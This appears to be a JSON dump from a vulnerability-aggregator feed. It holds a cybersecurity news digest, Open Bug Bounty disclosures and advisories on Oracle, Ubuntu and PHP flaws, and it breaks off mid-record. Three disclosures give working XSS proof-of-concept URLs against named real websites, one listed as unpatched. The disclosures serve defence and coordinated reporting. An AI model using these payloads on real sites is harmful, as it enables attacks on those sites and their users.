News: **[Coincheck hack: How investors can protect their digital money](<http://www.ibtimes.sg/coincheck-hack-how-investors-can-protect-their-digital-money-23897>) - International Business Times\n\n**Carbon Black in the News: **[Creating a culture of cyber security safety is critical for CEOs](<https://www.cso.com.au/article/632863/creating-culture-cyber-security-safety-critical-ceos/>) - CSO Online\n\n[Thinking about a Career Move in Cybersecurity?](<https://www.darkreading.com/operations/thinking-about-a-career-move-in-cybersecurity/a/d-id/1330944>) - Dark Reading\n\n[Snake Oil Salesmen Plague the Security Industry, But Not Everyone Is Staying Quiet](<https://gizmodo.com/snake-oil-salesmen-plague-the-security-industry-but-no-1822590687>) - Gizmodo\n\n[Google Cloud Least-Privilege Function Goes Live](<https://www.darkreading.com/cloud/google-cloud-least-privilege-function-goes-live/d/d-id/1330957>) - Dark Reading\n\n[Autosploit marries Shodan, Metasploit, puts IoT devices at risk](<https://www.scmagazine.com/autosploit-marries-shodan-metasploit-puts-iot-devices-at-risk/article/740912/>) - SC Magazine\n\n[Cryptominers and malspam up while zero days and ransomware decline](<https://www.scmagazine.com/cryptominers-and-malspam-up-while-zero-days-and-ransomware-decline/article/740911/>) - SC Magazine\n\n**Did You Know?**** \n**\n\nBill Belichick has appeared in over 20 percent of Super Bowls\n\n**Quote of the Day**\n\n\u201cOn a team, it\u2019s not the strength of the individual players, but it is the strength of the unit and how they all function together.\u201d\n\n**Today's Video of the Day \n**\n\n**Today's Trivia!\n\n**How many Super Bowls have the Philadelphia Eagles won to date?\n\n**Yesterday's Question: **Who was the first person to walk on the moon?\n\n**Answer: **Neil Armstrong\n\nBeat the Streak! Our current longest streak of correct answers comes from** Cait R., who has achieved correct answers for 73 days straight.** Can you beat the streak?\n\n**Current Streaks** \nCait R. - 73 days \n@xcelr8 - 63 days \nFelicia A. - 63 days \n@kimwh - 55 days \nKourken A. - 48 days\n\n**Hall-of-Fame Streaks** \n@kimwh - 197 days \nCait R. - 106 days \nKevin F. - 85 days\n\nTweet the correct answer to @CarbonBlack_Inc and get a shout out in tomorrow's Morning Coffee and your Twitter handle in a #FF tweet at the end of the week!\n\nThe post [February 1, 2018 - Morning Cyber Coffee Headlines - \"Super Bowl\" Edition](<https://www.carbonblack.com/2018/02/01/february-1-2018-morning-cyber-coffee-headlines-super-bowl-edition/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "modified": "2018-02-01T15:54:59", "published": "2018-02-01T15:54:59", "href": "https://www.carbonblack.com/2018/02/01/february-1-2018-morning-cyber-coffee-headlines-super-bowl-edition/", "id": "CARBONBLACK:831B99E315B1EF62264096D2FC39C00E", "type": "carbonblack", "title": "February 1, 2018 \u2013 Morning Cyber Coffee Headlines \u2013 \u201cSuper Bowl\u201d Edition", "cvss": {"score": 0.0, "vector": "NONE"}}], "openbugbounty": [{"lastseen": "2017-12-26T02:07:55", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n https://vacatures.centrumvoorwerk.nl/display-job/23897/Business-Controller.html?searchId=%22%27--!%3E%3C/Title/%3C/Style/%3C/Script/%3C/c/%3C/Noscript/%3C/Pre/%3C/Xmp%3E%3CBody/OnPageShow=confirm(/OPENBUGBOUNTY/)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| Unknown / Not calculated \nVIP website status:| No \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 11 November, 2017 21:24 GMT \nGeneric security notifications sent to website owner| 11 November, 2017 21:27 GMT \nVulnerability details disclosed by researcher| 20 December, 2017 16:20 GMT \nVulnerability patched by the website owner| 21 December, 2017 08:35 GMT\n", "modified": "2017-12-21T08:35:00", "published": "2017-11-11T21:24:00", "href": "https://www.openbugbounty.org/reports/410608/", "id": "OBB:410608", "type": "openbugbounty", "title": "vacatures.centrumvoorwerk.nl XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-14T23:23:17", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n https://www.zonebourse.com/AIRBUS-SE-4637/x%22%3E%3CsvG%20onLoad=prompt(9)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Verification in progress \nLatest check for patch:| 14.01.2018 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 23897 \nVIP website status:| Yes \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 15 October, 2017 23:48 GMT \nVulnerability existence verified and confirmed| 16 October, 2017 05:32 GMT \nGeneric security notifications sent to website owner| 16 October, 2017 05:32 GMT \nNotification sent to subscribers (without technical details)| 16 October, 2017 06:17 GMT \nVulnerability details disclosed by researcher| 14 January, 2018 05:35 GMT\n", "modified": "2018-01-14T05:35:00", "published": "2017-10-15T23:48:00", "href": "https://www.openbugbounty.org/reports/339460/", "id": "OBB:339460", "title": "zonebourse.com XSS vulnerability ", "type": "openbugbounty", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-18T17:41:12", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n http://www.tdrzd.ru/search/?rid=23897&textSearch;=%22%3E%3Csvg%2Fonload%3Dprompt%28/XSSPOSED/%29%3E&x;=0&y;=0\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 25.07.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 4880872 \nGoogle Pagerank| 4 \nVIP website status:| No \nCheck tdrzd.ru SSL connection:| (Grade: F) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability reported| 4 November, 2015 21:31 GMT \nVulnerability existence verified and confirmed| 4 November, 2015 21:33 GMT\n", "modified": "2015-11-04T21:33:00", "published": "2015-11-04T21:31:00", "href": "https://www.openbugbounty.org/reports/100973/", "id": "OBB:100973", "type": "openbugbounty", "title": "tdrzd.ru XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research &#40;now part of Flexera Software&#41; 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1&#41; Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2&#41; Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3&#41; Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS &#40;Denial of Service&#41; and compromise an application using the SDK.\r\n\r\n1&#41; An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2&#41; An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4&#41; Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5&#41; Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6&#41; Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research &#40;now part\r\nof Flexera Software&#41;.\r\n\r\n======================================================================\r\n\r\n7&#41; References\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8&#41; About Secunia &#40;now part of Flexera Software&#41;\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9&#41; Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; High &#40;H&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; Single &#40;S&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions &#40;afamexts.sql&#41; does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password &#40;for example,\r\ndefault password APPS/APPS&#41;, he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN 